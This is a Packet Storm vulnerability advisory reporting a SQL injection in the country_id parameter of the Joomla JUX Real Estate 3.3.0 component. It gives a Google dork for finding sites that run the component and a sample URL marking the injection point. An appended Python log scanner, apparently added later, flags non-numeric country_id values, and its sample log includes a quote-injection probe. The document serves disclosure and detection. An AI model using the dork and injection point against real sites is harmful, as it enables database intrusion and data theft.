Joomla JUX Real Estate 3.3.0 SQL Injection

2018-01-05T00:00:00
ID PACKETSTORM:145684
Type packetstorm
Reporter Bilal Kardadou
Modified 2018-01-05T00:00:00

Description

`################################################  
#Title: Joomla! JUX Real Estate 3.3.0 - SQL injection  
#Credit: Bilal KARDADOU  
#Vendor: https://joomlaux.com  
#URL: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/jux-real-estate/  
#Product: 'Joomla! JUX Real Estate 3.3.0'  
#Developer: JoomlaUX  
#Extension type: Plugin  
#Last updated: Oct 30 2017  
#Compatibility: 3.X  
#Type: Paid download  
#Google Dork: inurl:"index.php?option=com_jux_real_estate"  
################################################  
#  
# Description:  
# JUX Real Estate is a Joomla! component designed to fit a multitude of real estate related needs, and it is developed by the JoomlaUX team.  
#  
#  
# --Method=GET -p [country_id]  
#  
# -u "http://127.0.0.1/realestate/index.php?option=com_jux_real_estate&view=realties&Itemid=148&title=a&price_slider_lower=28607&price_slider_upper=400000&area_slider_lower=30&area_slider_upper=400&type_id=0&cat_id=0&country_id=[SQLI]&locstate=&beds=0&agent_id=&baths=0&jp_yearbuilt=&button=Search"  
#  
# PoC:  
# https://prnt.sc/hw0u6q  
#  
#  
# Bilal KARDADOU - https://www.linkedin.com/in/kardadou/  
################################################  
`
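
A log check for the parameter named above, added here as an example and not part of the original advisory or the vendor's code: it flags requests to com_jux_real_estate whose country_id does not decode to a plain integer. The combined access-log format, the integer-only expectation for country_id, and the function names are assumptions; the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

COMPONENT = "com_jux_real_estate"   # value of option= in the advisory's URL
ID_PARAM = "country_id"             # parameter the advisory reports as injectable

# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_country_id(log_line):
    """Return the decoded country_id if it is not a plain integer, else None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
    if COMPONENT not in query.get("option", []):
        return None
    # parse_qs keeps every occurrence, so a repeated parameter cannot hide a bad value.
    for value in query.get(ID_PARAM, []):
        # Assumption: a blank value is a search with no country selected.
        if value and not re.fullmatch(r"[0-9]+", value):
            return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for each flagged entry."""
    hits = []
    for number, line in enumerate(lines, start=1):
        value = suspicious_country_id(line)
        if value is not None:
            hits.append((number, value))
    return hits

# Constructed sample entries (documentation IP range), not taken from a real server.
SAMPLE_LOG = [
    '203.0.113.5 - - [05/Jan/2018:10:00:01 +0000] "GET /realestate/index.php?option=com_jux_real_estate&view=realties&country_id=12&beds=0 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [05/Jan/2018:10:00:07 +0000] "GET /realestate/index.php?option=com_jux_real_estate&view=realties&country_id=12%27 HTTP/1.1" 500 312',
    '203.0.113.9 - - [05/Jan/2018:10:00:09 +0000] "GET /realestate/index.php?option=com_content&country_id=x HTTP/1.1" 200 900',
    '203.0.113.5 - - [05/Jan/2018:10:00:12 +0000] "GET /realestate/index.php?option=com_jux_real_estate&country_id=&locstate= HTTP/1.1" 200 4800',
    '203.0.113.9 - - [05/Jan/2018:10:00:15 +0000] "GET /realestate/index.php?option=com_jux_real_estate&country_id=3&country_id=3%20abc HTTP/1.1" 200 700',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: non-numeric {ID_PARAM} = {value!r}")
```

The same integer-only rule can be enforced in front of the site as a request filter until the component validates the parameter itself.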